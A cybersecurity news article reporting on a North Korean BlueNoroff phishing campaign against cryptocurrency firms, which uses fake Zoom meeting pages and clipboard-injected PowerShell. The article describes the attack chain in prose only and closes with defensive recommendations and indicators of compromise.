Hackers News Hackers News
  • CyberSecurity News
  • Threats
  • Attacks
  • Vulnerabilities
  • Breaches
  • Comparisons

Social Media

Hackers News Hackers News
  • CyberSecurity News
  • Threats
  • Attacks
  • Vulnerabilities
  • Breaches
  • Comparisons
Search the Site
Popular Searches:
technology Amazon AI
Recent Posts
Anthropic Details Claude 3.5 Sonnet Safeguards and Jailbreak Framework
July 3, 2026
Google Disrupts NetNut Residential Proxy Botnet Exploiting 2 Million Devices
July 3, 2026
AsyncRAT Campaign Leverages ScreenConnect to Evade Detection
July 2, 2026
Home/Threats/BlueNoroff Uses Fileless PowerShell, AI Zoom Lures in New Campaign
Threats

BlueNoroff Uses Fileless PowerShell, AI Zoom Lures in New Campaign

Key Takeaways North Korea’s BlueNoroff (APT38) group is executing a sophisticated phishing campaign targeting Web3 and cryptocurrency firms across over 20 countries. The attack chain leverages...

Sarah simpson
Sarah simpson
April 29, 2026 4 Min Read
49 0

Key Takeaways

  • North Korea’s BlueNoroff (APT38) group is executing a sophisticated phishing campaign targeting Web3 and cryptocurrency firms across over 20 countries.
  • The attack chain leverages AI-generated Zoom lures and a unique “ClickFix” clipboard injection technique to deploy fileless PowerShell malware.
  • Victims, often C-level executives, face rapid system compromise, persistent access for months, and exfiltration of sensitive data, including browser credentials and webcam footage used for future deepfake lures.

North Korea’s state-sponsored cybercrime syndicate, the Lazarus Group, has unleashed a new, highly effective campaign orchestrated by its financially motivated subgroup, BlueNoroff. This operation, detailed in a recent analysis by Arctic Wolf, employs advanced social engineering, AI-generated content, and fileless PowerShell techniques to infiltrate Web3 and cryptocurrency organizations globally. The United States accounts for a significant 41% of the identified victims in this widespread attack, which has impacted over 20 countries.

Table Of Content

  • Key Takeaways
  • Sophisticated Social Engineering and AI Lures
  • The ClickFix Payload Delivery
  • What You Should Do

Sophisticated Social Engineering and AI Lures

The attack sequence begins with a carefully crafted spear-phishing email. Threat actors impersonate legal professionals within the FinTech sector, sending Calendly invitations to their targets. Once a victim accepts the meeting, the malicious actor subtly replaces the legitimate Google Meet link with a typosquatted Zoom URL, meticulously designed to mimic an authentic meeting link.

When the unsuspecting victim clicks the fabricated link, their browser loads a self-contained HTML page. This page is an elaborate replica of a genuine Zoom meeting interface, complete with simulated participant video tiles, looping video footage, and a dynamic “active speaker” indicator. This deceptive environment is critical to the next stage of the attack.

Arctic Wolf analysts confirmed this targeted intrusion against a North American Web3 and cryptocurrency company, attributing it with high confidence to BlueNoroff, also known as APT38, Sapphire Sleet, and Stardust Chollima. The speed of the compromise is alarming, with researchers observing the full attack chain—from initial click to complete system compromise—concluding in under five minutes.

Post-compromise forensic analysis revealed that the attackers maintained persistent access on the victim’s device for 66 days. During this period, they exfiltrated critical data, including browser credentials, Telegram session data, and live webcam footage. This stolen webcam footage is then repurposed to create even more convincing lures for subsequent targets, fueling a self-reinforcing deepfake production pipeline.

Analysts discovered over 950 files on the attacker’s hosting server, comprising AI-generated headshot images – confirmed via C2PA cryptographic metadata as outputs of OpenAI’s GPT-4o model – alongside genuine webcam footage from previous victims and composite deepfake videos. This continuous refinement of their deceptive tactics ensures that each successful attack improves the credibility of future social engineering attempts. BlueNoroff’s strategic focus is evident in its targeting: CEOs and founders constitute 45% of all identified victims, reflecting the group’s intent to gain direct access to cryptocurrency assets and wallet infrastructure.

The ClickFix Payload Delivery

Upon entering the fake Zoom meeting environment, victims encounter a persistent overlay message claiming their SDK is outdated and requires an update. This is the core of the “ClickFix” clipboard injection attack. The overlay presents what appear to be benign diagnostic commands, instructing the user to copy and paste them into the Windows Run dialog or terminal.

Crucially, as the victim copies these seemingly harmless commands, the malicious HTML page covertly replaces the clipboard content with a hidden PowerShell execution command. When the victim pastes and executes, they unwittingly trigger the malicious payload.

The injected PowerShell command downloads an obfuscated second-stage script from the attacker’s command-and-control (C2) server. This script is saved to the user’s Temp folder as “chromechip.log” and then executed in a hidden window. This initiates a persistent, fileless C2 beacon that operates entirely in memory, contacting the attacker every five seconds. The implant gathers extensive system data, including hostname, OS version, running processes, administrative privileges, and timezone information, packaging it into a structured JSON beacon for transmission to the remote server.

What You Should Do

  • Verify Meeting Links: Always cross-reference meeting links through a secondary communication channel (e.g., a phone call or separate email) before joining any virtual call, especially for sensitive discussions.
  • Beware of Software Update Prompts: Legitimate video conferencing platforms do not typically instruct users to run terminal commands to resolve audio or camera issues. Treat such prompts with extreme suspicion.
  • Block C2 Infrastructure: Security teams should immediately block all identified command-and-control (C2) addresses associated with this campaign.
  • Remove Persistence Mechanisms: Delete the Startup shortcut named “Chrome Update Certificated.lnk” and remove “chromechip.log” and “chrome-debug-data001.log” from affected devices.
  • Rotate Credentials: Promptly rotate all browser-stored passwords, API keys, and cryptocurrency wallet credentials on any potentially compromised system.
  • Enable PowerShell Script Block Logging: Implement PowerShell Script Block Logging on all endpoints to enhance the detection capabilities for obfuscated script execution, a key tactic in this campaign.

Disclaimer: HackersRadar reports on cybersecurity threats and incidents for informational and awareness purposes only. We do not engage in hacking activities, data exfiltration, or the hosting or distribution of stolen or leaked information. All content is based on publicly available sources.

Tags:

AttackphishingSecurityThreat

Share Article

Sarah simpson

Sarah simpson

Sarah is a cybersecurity journalist specializing in threat intelligence and malware analysis. With over 8 years of experience covering APT groups, zero-day exploits, and advanced persistent threats, Sarah brings deep technical expertise to breaking cybersecurity news. Previously, she worked as a security researcher at leading threat intelligence firms, where she analyzed malware samples and tracked cybercriminal operations. Sarah holds a Master's degree in Computer Science with a focus on cybersecurity and is a regular contributor to major security conferences.

Previous Post

cPanel Critical Authentication Flaw CVE-2024-XXXX Patched

Next Post

VECT 2.0 Ransomware Destroys Files on Windows, Linux, and ESXi

No Comment! Be the first one.

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

Popular Posts
Critical Claude Cowork Sandbox Vulnerability Lets Attackers Run Commands as Root
July 2, 2026
Ousaban Malware Targets Iberian Banks with Phishing PDFs and VBS Downloader
July 2, 2026
Citrix Bleed (CVE-2023-4966) Critical Vulnerability Actively Exploited
July 2, 2026
Top Authors
Marcus Rodriguez
Marcus Rodriguez
Jennifer sherman
Jennifer sherman
Emy Elsamnoudy
Emy Elsamnoudy
Let's Connect
156k
2.25m
285k

Related Posts

Jennifer sherman
By Jennifer sherman
Threats

GlassWorm Attacks macOS via Malicious VS Code…

January 1, 2026
Emy Elsamnoudy
By Emy Elsamnoudy
Attacks

ClickFix Attack Hides Malicious Code via Stegan Security

January 1, 2026
Sarah simpson
By Sarah simpson
Vulnerabilities

MongoBleed Detector Tool Released to Detect MongoDB Vulnerability(CVE-2025-14847)

January 1, 2026
Emy Elsamnoudy
By Emy Elsamnoudy
Breaches

Conti Ransomware Gang Leaders & Infrastructure Exposed

January 1, 2026
Hackers News Hackers News
  • [email protected]

Quick Links

  • Contact Us
  • Privacy Policy
  • Terms of service

Categories

Attacks
Breaches
Comparisons
CyberSecurity News
Threats
Vulnerabilities

Let's keep in touch

receive fresh updates and breaking cyber news every day and week!

All Rights Reserved by HackersRadar ©2026

Follow Us